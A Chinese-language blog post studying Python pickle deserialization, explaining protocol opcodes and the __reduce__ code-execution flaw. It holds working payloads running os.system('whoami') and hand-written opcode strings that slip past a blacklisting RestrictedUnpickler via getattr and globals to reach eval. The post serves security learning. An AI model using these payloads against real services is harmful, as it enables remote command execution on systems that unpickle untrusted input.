

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/default.png">
  <link rel="icon" href="/img/default.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="KKfine&#39;s blog">
  <meta name="keywords" content="">
  
  <title>pickle学习 - KKfine&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.7.2/styles/atelier-estuary-light.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.11","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>KKfine's blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/17.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="pickle学习">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-08-11 22:06" pubdate>
        2021年8月11日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      4.1k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      59
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">pickle学习</h1>
            
            <div class="markdown-body">
              <h1 id="Pickle"><a href="#Pickle" class="headerlink" title="Pickle"></a>Pickle</h1><p>关于<code>pickle</code>的知识</p>
<p>参考：<a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/264363.html">https://www.freebuf.com/articles/web/264363.html</a></p>
<p>​            <a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/361349643">https://zhuanlan.zhihu.com/p/361349643</a></p>
<p>​            <a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/252189.html">https://www.freebuf.com/articles/web/252189.html</a></p>
<p>pickle是python语言的一个标准模块，实现了基本的数据序列化和反序列化。<br>pickle模块是以二进制的形式序列化后保存到文件中（保存文件的后缀为<code>.pkl</code>），不能直接打开进行预览。</p>
<p><code>pickle.dumps</code>将对象反序列化为字符串，<code>pickle.dump</code>将反序列化后的字符串存储为文件。</p>
<p><code>pickle.loads() </code>对象反序列化 <code>pickle.load()</code> 对象反序列化，从文件中读取数据。</p>
<blockquote>
<p>#序列化 pickle.dump(obj, file, protocol=None,) obj表示要进行封装的对象(必填参数） file表示obj要写入的文件对象 以二进制可写模式打开即wb(必填参数） </p>
<p>#反序列化 pickle.load(file, *, fix_imports=True, encoding=”ASCII”, errors=”strict”, buffers=None) file文件中读取封存后的对象 以二进制可读模式打开即rb(必填参数)</p>
</blockquote>
<blockquote>
<p>#序列化 pickle.dumps(obj, protocol=None,*,fix_imports=True) dumps()方法不需要写入文件中，直接返回一个序列化的bytes对象。</p>
<p>#反序列化 pickle.loads(bytes_object, *,fix_imports=True, encoding=”ASCII”. errors=”strict”) loads()方法是直接从bytes对象中读取序列化的信息，而非从文件中读取。</p>
</blockquote>
<p>简单看一下序列化后结果，用的是<code>pickle0版本</code>看的更清楚一点。</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-comment"># -*- coding: gbk -*-</span><br><span class="hljs-keyword">import</span> pickle<br><span class="hljs-keyword">import</span> os<br><span class="hljs-keyword">import</span> subprocess<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Test</span>:</span><br>    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span>(<span class="hljs-params">self,a,b</span>):</span><br>        self.a = a<br>        self.b = b<br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    demo = Test(<span class="hljs-string">&#x27;KK&#x27;</span>,<span class="hljs-string">&#x27;fine&#x27;</span>)<br>    <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;test.pkl&#x27;</span>,<span class="hljs-string">&#x27;wb&#x27;</span>) <span class="hljs-keyword">as</span> f:<br>        pickle.dump(demo,f,protocol=<span class="hljs-number">0</span>)<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;\n&quot;</span>)<br>    <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;test.pkl&#x27;</span>,<span class="hljs-string">&#x27;rb&#x27;</span>) <span class="hljs-keyword">as</span> f:<br>        <span class="hljs-built_in">print</span>(pickle.load(f))<br><br></code></pre></div></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/7e76970ea22942ee8ff360af46d7e185.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>指令集的介绍，具体和PVM有关。先可看看这张图，每个<code>protocol</code>版本不一样的话，序列化出来的结果是不一样的。</p>
<ol>
<li><code>c</code>：引入模块和对象，模块名和对象名以换行符分割。（<code>find_class</code>校验就在这一步，也就是说，只要c这个OPCODE的参数没有被<code>find_class</code>限制，其他地方获取的对象就不会被沙盒影响了，这也是我为什么要用getattr来获取对象）</li>
<li><code>(</code>：压入一个标志到栈中，表示元组的开始位置</li>
<li><code>t</code>：从栈顶开始，找到最上面的一个<code>(</code>，并将<code>(</code>到<code>t</code>中间的内容全部弹出，组成一个元组，再把这个元组压入栈中</li>
<li><code>R</code>：从栈顶弹出一个可执行对象和一个元组，元组作为函数的参数列表执行，并将返回值压入栈上</li>
<li><code>p</code>：将栈顶的元素存储到memo中，p后面跟一个数字，就是表示这个元素在memo中的索引</li>
<li><code>V</code>、<code>S</code>：向栈顶压入一个（unicode）字符串</li>
<li><code>.</code>：表示整个程序结束</li>
</ol>
<p><img src="https://image.3001.net/images/20201016/1602833405_5f894bfd4cd7bd1a9ecc0.png!small?1602833407394" srcset="/img/loading.gif" lazyload alt="img"></p>
<h2 id="漏洞介绍"><a href="#漏洞介绍" class="headerlink" title="漏洞介绍"></a>漏洞介绍</h2><p>反序列化漏洞出现在 <code>__reduce__()</code>魔法函数上，这一点和PHP中的<code>__wakeup()</code>魔术方法类似，都是因为每当反序列化过程开始或者结束时 , 都会自动调用这类函数。而这恰好是反序列化漏洞经常出现的地方。</p>
<p>而且在反序列化过程中，因为编程语言需要根据反序列化字符串去解析出自己独特的语言数据结构，所以就必须要在内部把解析出来的结构去执行一下。如果在反序列化过程中出现问题，便可能直接造成RCE漏洞.</p>
<p>另外<code>pickle.loads</code>会解决<code>import</code>问题，对于未引入的<code>module</code>会自动尝试<code>import</code>。那么也就是说整个python标准库的代码执行、命令执行函数都可以进行使用。这里贴一下官方文档把，这个函数还挺常见的。</p>
<p><img src="https://img-blog.csdnimg.cn/b2aba418804f4b98ab539abf1bfae53d.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>当 <code>__reduce__()</code>函数返回一个元组时 , <strong>第一个元素</strong>是一个可调用对象 , 这个对象会在创建对象时被调用 . <strong>第二个元素</strong>是可调用对象的参数 , 同样是一个元组。这点跟PVM中的<code>R</code>操作码功能相似，可以对比下：</p>
<figure class="highlight plain"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs plain">将之前压入栈中的元组和可调用对象全部弹出 , 然后将该元组作为可调用参数的对象并执行该对象 。最后将结果压入到栈中 <br></code></pre></div></td></tr></table></figure>

<p>事实上 , <code>R</code>操作码就是 <code>__reduce__()</code>魔术函数的底层实现 . 而在反序列化过程结束的时候 , Python 进程会自动调用 <code>__reduce__()</code>魔术方法 . 如果可以控制被调用函数的参数 , Python 进程就可以执行恶意代码 .</p>
<h1 id="opcode进阶"><a href="#opcode进阶" class="headerlink" title="opcode进阶"></a>opcode进阶</h1><p>直接看好文<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7436#toc-5">https://xz.aliyun.com/t/7436#toc-5</a></p>
<p>​                    <a target="_blank" rel="noopener" href="https://misakikata.github.io/2020/04/python-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/#pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96">https://misakikata.github.io/2020/04/python-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/#pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96</a></p>
<p>​                    <a target="_blank" rel="noopener" href="https://www.jianshu.com/p/8fd3de5b4843">https://www.jianshu.com/p/8fd3de5b4843</a></p>
<p>​                    <a target="_blank" rel="noopener" href="https://dar1in9s.github.io/2020/03/20/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/#%E8%8A%B1%E5%BC%8Fimport">https://dar1in9s.github.io/2020/03/20/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/#%E8%8A%B1%E5%BC%8Fimport</a></p>
<p>​                    <a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/code-breaking-2018-python-sandbox.html">https://www.leavesongs.com/PENETRATION/code-breaking-2018-python-sandbox.html</a></p>
<p>沙箱逃逸    <a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/52#toc-6">https://xz.aliyun.com/t/52#toc-6</a></p>
<h4 id="opcode版本"><a href="#opcode版本" class="headerlink" title="opcode版本"></a>opcode版本</h4><p>pickle由于有不同的实现版本，在py3和py2中得到的opcode不相同。但是pickle可以向下兼容（所以用v0就可以在所有版本中执行）。目前，pickle有6种版本。测试一下</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">import</span> pickle<br><br>a=&#123;<span class="hljs-string">&#x27;1&#x27;</span>: <span class="hljs-string">&#x27;KKfine&#x27;</span>&#125;<br><br><span class="hljs-built_in">print</span>(<span class="hljs-string">f&#x27;# 原变量：<span class="hljs-subst">&#123;a&#125;</span>&#x27;</span>)<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">6</span>):<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">f&#x27;pickle版本<span class="hljs-subst">&#123;i&#125;</span>&#x27;</span>,pickle.dumps(a,protocol=i))<br><br><span class="hljs-comment"># 输出：</span><br><span class="hljs-comment"># 原变量：&#123;&#x27;1&#x27;: &#x27;KKfine&#x27;&#125;</span><br>pickle版本<span class="hljs-number">0</span> <span class="hljs-string">b&#x27;(dp0\nV1\np1\nVKKfine\np2\ns.&#x27;</span><br>pickle版本<span class="hljs-number">1</span> <span class="hljs-string">b&#x27;&#125;q\x00X\x01\x00\x00\x001q\x01X\x06\x00\x00\x00KKfineq\x02s.&#x27;</span><br>pickle版本<span class="hljs-number">2</span> <span class="hljs-string">b&#x27;\x80\x02&#125;q\x00X\x01\x00\x00\x001q\x01X\x06\x00\x00\x00KKfineq\x02s.&#x27;</span><br>pickle版本<span class="hljs-number">3</span> <span class="hljs-string">b&#x27;\x80\x03&#125;q\x00X\x01\x00\x00\x001q\x01X\x06\x00\x00\x00KKfineq\x02s.&#x27;</span><br>pickle版本<span class="hljs-number">4</span> <span class="hljs-string">b&#x27;\x80\x04\x95\x11\x00\x00\x00\x00\x00\x00\x00&#125;\x94\x8c\x011\x94\x8c\x06KKfine\x94s.&#x27;</span><br>pickle版本<span class="hljs-number">5</span> <span class="hljs-string">b&#x27;\x80\x05\x95\x11\x00\x00\x00\x00\x00\x00\x00&#125;\x94\x8c\x011\x94\x8c\x06KKfine\x94s.&#x27;</span><br><br><br><span class="hljs-comment">#对于pickle版本3 ：</span><br><span class="hljs-comment"># \x80：协议头声明 \x03：协议版本</span><br><span class="hljs-comment"># \x06\x00\x00\x00：数据长度：6</span><br><span class="hljs-comment"># KKfine：数据</span><br><span class="hljs-comment"># q：储存栈顶的字符串长度：一个字节（即\x00）</span><br><span class="hljs-comment"># \x00：栈顶位置</span><br><span class="hljs-comment"># .：数据截止</span><br></code></pre></div></td></tr></table></figure>

<p>但是十六进制不太好观察时如何序列化的，可以使用pickletools可以方便的将opcode转化为便于肉眼读取的形式。</p>
<p><img src="https://github-1300513062.cos.ap-shanghai.myqcloud.com/img/image-20200428142817753.png" srcset="/img/loading.gif" lazyload alt="image-20200428142817753"></p>
<p>拿个例子看一下</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">import</span> pickletools<br><span class="hljs-keyword">import</span> pickle<br><span class="hljs-keyword">import</span> os<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">exp</span>(<span class="hljs-params"><span class="hljs-built_in">object</span></span>):</span><br>    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__reduce__</span>(<span class="hljs-params">self</span>):</span><br>        <span class="hljs-keyword">return</span> (os.system,(<span class="hljs-string">&#x27;whoami&#x27;</span>,))<br>e = exp()<br>s = pickle.dumps(e,protocol=<span class="hljs-number">2</span>)  <span class="hljs-comment">#python3.8默认是版本4，会将操作符换成十六进制</span><br>pickletools.dis(s)<br><br><br>    <span class="hljs-number">0</span>: \x80 PROTO      <span class="hljs-number">2</span>						<span class="hljs-comment">#协议版本 </span><br>    <span class="hljs-number">2</span>: c    GLOBAL     <span class="hljs-string">&#x27;nt system&#x27;</span>				<span class="hljs-comment">#将&#x27;nt system&#x27;压入栈中		       os.system</span><br>   <span class="hljs-number">13</span>: q    BINPUT     <span class="hljs-number">0</span>						<span class="hljs-comment">#把对象存储到memo的第0个位置</span><br>   <span class="hljs-number">15</span>: X    BINUNICODE <span class="hljs-string">&#x27;whoami&#x27;</span>					<span class="hljs-comment">#压入一个utf-8的元素参数   			&#x27;whoami&#x27;</span><br>   <span class="hljs-number">26</span>: q    BINPUT     <span class="hljs-number">1</span>						<span class="hljs-comment">#存储到memo的第1个位置</span><br>   <span class="hljs-number">28</span>: \x85 TUPLE1								<span class="hljs-comment">#将前面的元素参数弹出，组成元组再压栈，类比于命令&#x27;t&#x27;     (&#x27;whoami&#x27;,)</span><br>   <span class="hljs-number">29</span>: q    BINPUT     <span class="hljs-number">2</span>						<span class="hljs-comment">#将上面的元组存储到memo的第2个位置           ...</span><br>   <span class="hljs-number">31</span>: R    REDUCE								<span class="hljs-comment">#将对象和元组组合执行，结果压栈          os.system(&#x27;whoami&#x27;)</span><br>   <span class="hljs-number">32</span>: q    BINPUT     <span class="hljs-number">3</span>						<span class="hljs-comment">#存储到memo的第3个位置上                    ...</span><br>   <span class="hljs-number">34</span>: .    STOP								<span class="hljs-comment">#结束</span><br>highest protocol among opcodes = <span class="hljs-number">2</span><br><br>Process finished <span class="hljs-keyword">with</span> exit code <span class="hljs-number">0</span><br><br><br>用protocol=<span class="hljs-number">0</span>输出为<br>cnt<br>system<br>p0<br>(Vwhoami<br>p1<br>tp2<br>Rp3<br>.<br></code></pre></div></td></tr></table></figure>

<p>了解这些是为了便于下面尝试手动构造<code>opcode</code>，因为有时候会禁止使用某些模块或者命令执行函数时，需要自己构造来进行绕过。例如当源码如下时：</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">import</span> pickle<br><span class="hljs-keyword">import</span> io<br><span class="hljs-keyword">import</span> builtins<br><br>__all__ = (<span class="hljs-string">&#x27;PickleSerializer&#x27;</span>, )<br><br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">RestrictedUnpickler</span>(<span class="hljs-params">pickle.Unpickler</span>):</span><br>    blacklist = &#123;<span class="hljs-string">&#x27;eval&#x27;</span>, <span class="hljs-string">&#x27;exec&#x27;</span>, <span class="hljs-string">&#x27;execfile&#x27;</span>, <span class="hljs-string">&#x27;compile&#x27;</span>, <span class="hljs-string">&#x27;open&#x27;</span>, <span class="hljs-string">&#x27;input&#x27;</span>, <span class="hljs-string">&#x27;__import__&#x27;</span>, <span class="hljs-string">&#x27;exit&#x27;</span>&#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">find_class</span>(<span class="hljs-params">self, module, name</span>):</span><br>        <span class="hljs-comment"># Only allow safe classes from builtins.</span><br>        <span class="hljs-keyword">if</span> module == <span class="hljs-string">&quot;builtins&quot;</span> <span class="hljs-keyword">and</span> name <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> self.blacklist:<br>            <span class="hljs-keyword">return</span> <span class="hljs-built_in">getattr</span>(builtins, name)<br>        <span class="hljs-comment"># Forbid everything else.</span><br>        <span class="hljs-keyword">raise</span> pickle.UnpicklingError(<span class="hljs-string">&quot;global &#x27;%s.%s&#x27; is forbidden&quot;</span> %<br>                                     (module, name))<br><br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">PickleSerializer</span>():</span><br>    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">dumps</span>(<span class="hljs-params">self, obj</span>):</span><br>        <span class="hljs-keyword">return</span> pickle.dumps(obj)<br><br>    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">loads</span>(<span class="hljs-params">self, data</span>):</span><br>        <span class="hljs-keyword">try</span>:<br>            <span class="hljs-keyword">if</span> <span class="hljs-built_in">isinstance</span>(data, <span class="hljs-built_in">str</span>):<br>                <span class="hljs-keyword">raise</span> TypeError(<span class="hljs-string">&quot;Can&#x27;t load pickle from unicode string&quot;</span>)<br>            file = io.BytesIO(data)<br>            <span class="hljs-keyword">return</span> RestrictedUnpickler(file,<br>                              encoding=<span class="hljs-string">&#x27;ASCII&#x27;</span>, errors=<span class="hljs-string">&#x27;strict&#x27;</span>).load()<br>        <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:<br>            <span class="hljs-keyword">return</span> &#123;&#125;<br></code></pre></div></td></tr></table></figure>

<p>用<code>RestrictedUnpickler</code>类设置了一个白名单，判断<code>module == &quot;builtins&quot;</code>限制了必须为<code>builtins</code>，这其实也是官方给出的防御方法之一，这里限制了模块引用，危险函数也无法直接用了，但可以用<code>getattr</code>来构造opcode.</p>
<p>从显示上看，明显是0版本更为好构造，既然如此，就用0版本来手写一个。</p>
<p>这里先尝试构造一个<code>builtins.getattr(builtins, &#39;eval&#39;),(&#39;__import__(&quot;os&quot;).system(&quot;whoami&quot;)&#39;,)</code>。</p>
<p>首先得确保引入了<code>builtins</code>模块，又无法直接压入单一对象，也就是需要从某个模块中调用到<code>builtins</code>。例如<code>builtins.__dict__.get(&#39;globals&#39;)().get(&#39;__builtins__&#39;)</code>或者<code>builtins.globals().get(&#39;builtins&#39;)</code></p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">import</span> pickletools<br><span class="hljs-keyword">import</span> pickle<br><span class="hljs-keyword">import</span> os<br><span class="hljs-keyword">import</span>  builtins<br><span class="hljs-comment">#builtins.getattr(builtins, &#x27;eval&#x27;),(&#x27;__import__(&quot;os&quot;).system(&quot;whoami&quot;)&#x27;,).</span><br><span class="hljs-comment">#builtins.__dict__.get(globals)().get(&#x27;builtins&#x27;)</span><br><span class="hljs-comment">#builtins.getattr(builtins.__dict__,&#x27;get&#x27;)(&#x27;globals&#x27;)().get(&#x27;__builtins__&#x27;)</span><br>test = <span class="hljs-string">b&quot;&quot;&quot;cbuiltins</span><br><span class="hljs-string">getattr</span><br><span class="hljs-string">(cbuiltins</span><br><span class="hljs-string">dict</span><br><span class="hljs-string">S&#x27;get&#x27;</span><br><span class="hljs-string">tR(cbuiltins</span><br><span class="hljs-string">globals</span><br><span class="hljs-string">(tRS&#x27;builtins&#x27;</span><br><span class="hljs-string">tR.</span><br><span class="hljs-string">&quot;&quot;&quot;</span><br>data = pickle.loads(test)<br><span class="hljs-built_in">print</span>(data)<br></code></pre></div></td></tr></table></figure>

<p>这里理解得时候要注意R操作符没执行一次都要返回一个操作结果，最开始的``builtins.getattr(dict, ‘get’)<code>比较容易理解，后面</code>(t<code>这里是压入空元组，其实也可以用</code>)<code>直接压入空元组，然后接一个</code>R<code>就返回了</code>globals<code>全局字典，最后压入一个字符串</code>builtins<code>来获取这个模块。下面就可以拼接</code>eval`命令了。</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python">test = <span class="hljs-string">b&quot;&quot;&quot;cbuiltins</span><br><span class="hljs-string">getattr</span><br><span class="hljs-string">(cbuiltins</span><br><span class="hljs-string">dict</span><br><span class="hljs-string">S&#x27;get&#x27;</span><br><span class="hljs-string">tR(cbuiltins</span><br><span class="hljs-string">globals</span><br><span class="hljs-string">(tRS&#x27;builtins&#x27;</span><br><span class="hljs-string">tRp1</span><br><span class="hljs-string">cbuiltins</span><br><span class="hljs-string">getattr</span><br><span class="hljs-string">(g1 </span><br><span class="hljs-string">S&#x27;eval&#x27;</span><br><span class="hljs-string">tR(S&#x27;__import__(&quot;os&quot;).system(&quot;id&quot;)&#x27;</span><br><span class="hljs-string">tR.</span><br><span class="hljs-string">&quot;&quot;&quot;</span><br><span class="hljs-comment">#g1就是刚才获取到的builtins，我继续使用getattr，获取到了builtins.eval。</span><br></code></pre></div></td></tr></table></figure>



<p>防御得话可以设置白名单，看一下官方得文档，换成黑名单过滤也行。</p>
<p><img src="https://www.leavesongs.com/media/attachment/2019/05/27/e016b6fb-d6bd-402b-9f1c-59652fb1b9b4.9ad9519d3512.png" srcset="/img/loading.gif" lazyload alt="image.png"></p>
<p>算是在opcode入了个门，但还是挺基础的。</p>
<p>一些常见得opcode也有现成的，可以参考，但还是多手写熟悉一下。</p>
